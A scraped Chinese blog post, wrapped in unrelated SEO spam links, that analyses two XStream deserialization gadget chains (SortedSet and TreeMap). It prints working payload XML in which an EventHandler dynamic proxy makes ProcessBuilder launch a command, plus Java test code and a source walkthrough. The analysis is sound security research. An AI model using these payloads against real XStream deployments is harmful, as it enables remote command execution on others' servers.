当前位置: 首页 > news >正文

网站静态页模板辅助网站怎么做

网站静态页模板,辅助网站怎么做,潍坊哪家网站制作公司好,西安未央网站建设前文:【Web】浅聊XStream反序列化本源之恶意动态代理注入-CSDN博客 前言 在上一篇文章我们聊到可以用XStream反序列化来进行恶意动态代理的注入,但其有一个很大的限制就是必须要知道目标靶机会调用哪个接口的方法,才能去相应地精心构造对应…

前文:【Web】浅聊XStream反序列化本源之恶意动态代理注入-CSDN博客

前言

在上一篇文章我们聊到可以用XStream反序列化来进行恶意动态代理的注入,但其有一个很大的限制就是必须要知道目标靶机会调用哪个接口的方法,才能去相应地精心构造对应接口的动态代理类,触发EventHandler从而进行恶意命令执行。

有没有通用性更强的解决方案,不需要靶机执行某接口方法,只要完成反序列化的过程就可以直接利用呢?

自然是有的,下面我们就来介绍SortedSet和TreeMap两条链

复现

SortedSetExp.java

package com.XStream;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;public class SortedSetExp {public static void main(String[] args) throws Exception{FileInputStream fileInputStream = new FileInputStream("payload.xml");XStream xStream = new XStream();xStream.fromXML(fileInputStream);}
}

payload.xml

<sorted-set><string>foo</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class='java.beans.EventHandler'><target class='java.lang.ProcessBuilder'><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy>
</sorted-set>

TreeMapExp

package com.XStream;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;public class TreeMapExp {public static void main(String[] args) throws Exception{FileInputStream fileInputStream = new FileInputStream("payload2.xml");XStream xStream = new XStream();xStream.fromXML(fileInputStream);}
}

payload2.xml

<tree-map><entry><string>fookey</string><string>foovalue</string></entry><entry><dynamic-proxy><interface>java.lang.Comparable</interface><handler class='java.beans.EventHandler'><target class='java.lang.ProcessBuilder'><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy><string>good</string></entry>
</tree-map>

根源的原理

记住我们的目的:只要完成反序列化的过程就可以直接调用动态代理类的Eventhandler#invoke,为此我们需要让动态代理类接口的某个方法在反序列化还原过程中自动调用

这里大佬们找到的是Comparable接口的compareTo方法

在TreeMap的put方法里就进行了compareTo方法的调用,而下面的两条链,其实最后都是依托TreeMap#put来完成反序列化的数据结构还原的,这和我们的目标一拍即合。

 

SortedSet链分析

一开始是HierarchicalStreams.readClassType获取待反序列化类的Class对象,前半段和上篇文章讲的一样,不作赘述,我们直接关注不一样的点

来到DynamicProxyMapper#realClass,注意elementName和alias是不相等的

会继续调用super.realClass作为返回值type

跟进

跟进DefaultMapper.realClass,取到一个加载的SortedSet类(注意initialize参数为false,所以并未初始化)

 返回的type就是SortedSet.class

接着进到convertAnother对该类进行实例化

先是进行一个类型转化 ,mapper.defaultImplementationOf() 用于设定某个接口或抽象类的默认实现,以确保在没有显式指定实现的情况下,能够使用预设的默认实现。这样可以简化代码中对实现的选择和配置。

 成功将SortedSet转化为默认实现类型TreeSet

接着调用lookupConverterForType来取对应的converter,这里的this.converterLookup就是XStream

 跟进XStream#lookupConverterForType

跟进defaultConverterLookup.lookupConverterForType,这里的逻辑是,迭代this.converters,直到找到能转换出TreeSet类型,最后取到converter为TreeSetConverter

 然后传参进convert调用

跟进,调用TreeSetConverter#unmarshal

 跟进,调用TreeMapConverter#populateTreeMap,顾名思义,就是开始填充TreeMap

 先创建一个空sortedMap

循环取出所有反序列化完毕的元素存到sortedMap 

 这个sortedMap只是一个缓存的地方,真正的返回值是TreeMap。之后判断JVM是否全部缓存好元素了,然后把sortedMap的缓存元素全部放入TreeMap作为反序列化的返回对象

简单跟一跟

 最后调用了k(也就是动态代理类)的compareTo方法,传入参数是第一个key String

从而进到EventHandler#invoke,进行恶意命令的调用,这部分和上篇文章讲的一样,不再赘述。

TreeMap链分析

先是取到type为java.util.TreeMap

 后续type没有进行默认类型转换

取到TreeMapConverter来进行convert还原待反序列化类

最后又进了TreeMapConverter#populateTreeMap,来到了熟悉的环节,后面就和上面讲的一样了,不再赘述

http://www.yayakq.cn/news/609705/

相关文章:

  • js 访问网站统计刷新不增加次数企业网站建设中在方案设计上
  • 深圳网站建设网站制作网站设计wordpress返利
  • 站长之家seo工具苏州网站开发公司招聘信息
  • 东莞我的网站建设软件app定制开发
  • wordpress 插件 上传图片seo网站优化服务合同
  • 服装企业营销网站建设wordpress免费装修主题
  • 如何下载网站模板佛山做网站3lue
  • 烟台市科技局网站wordpress生成标签页
  • 厦门做公司网站临西网站建设费用
  • 超炫网站页面dedecms 5.7 关闭网站
  • 网站建设源代码上传360社区app
  • 住房和建设部信息网站东莞网站设计多少钱
  • 检测网站访问量网站挂载
  • 免费制作照片的网站动态ip建设网站
  • 网站建设公司做的网站wordpress插件的安装目录下
  • 门户网站建设管理好模版网站
  • 常用来做网站的首页本溪网站建设
  • seo整站排名我做的网站有时打开很慢什么原因
  • 企业网站为什么做优化网站如何导流量
  • 网站里怎样做物流跟踪功能汕头自助建站
  • 可不可以免费创建网站电子商务网站软件建设的核心是
  • 网站建设交易平台创业平台app有哪些
  • 做网站需要啥备案之类的嘛php企业网站程序
  • 钟山县住房和城乡建设局网站网站做留言板
  • 云邮企业邮箱官网网站推广优化服务
  • 商务网站建设体会郑州网站建设代理
  • 怎样办网站做宣传龙岗网站多少钱
  • html可以做网站后台吗深圳网络服务有限公司
  • 淘宝客做网站多少钱如何给网站绑定域名
  • 手机购物网站开发重庆教育网站建设